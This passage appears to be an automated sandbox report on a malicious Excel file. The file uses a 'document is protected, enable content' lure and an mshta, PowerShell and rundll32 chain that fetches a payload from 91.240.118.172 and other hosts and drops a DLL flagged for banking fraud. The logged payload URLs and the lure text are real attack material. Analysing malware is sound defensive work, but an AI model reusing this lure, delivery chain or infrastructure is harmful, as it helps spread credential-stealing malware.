Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 12_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Source: CJ68000754184.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: CJ68000754184.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... 
............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: CJ68000754184.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... 
............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: CJ68000754184.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068F8FD 9_2_0068F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068E991 9_2_0068E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068AB87 9_2_0068AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069907F 9_2_0069907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00682051 9_2_00682051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006A0056 9_2_006A0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00690001 9_2_00690001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00689011 9_2_00689011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006920BA 9_2_006920BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006870B3 9_2_006870B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068F09B 9_2_0068F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00694116 9_2_00694116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006851BB 9_2_006851BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006881B7 9_2_006881B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00682251 9_2_00682251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069A2E8 9_2_0069A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068E2CC 9_2_0068E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068B2C7 9_2_0068B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00685361 9_2_00685361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00684346 9_2_00684346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006A13AD 9_2_006A13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069C3A0 9_2_0069C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069D389 9_2_0069D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069E395 9_2_0069E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069044F 9_2_0069044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069F435 9_2_0069F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006864E2 9_2_006864E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00685548 9_2_00685548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068A55F 9_2_0068A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00692550 9_2_00692550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00698519 9_2_00698519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006995FA 9_2_006995FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068E5CF 9_2_0068E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069A666 9_2_0069A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069C631 9_2_0069C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00698606 9_2_00698606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006966CA 9_2_006966CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068D6D8 9_2_0068D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069176B 9_2_0069176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068B74D 9_2_0068B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069473C 9_2_0069473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00687735 9_2_00687735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00689714 9_2_00689714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00684816 9_2_00684816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00691889 9_2_00691889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00688969 9_2_00688969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069894B 9_2_0069894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006859F2 9_2_006859F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006A09B5 9_2_006A09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00681A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0068BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0069BB23
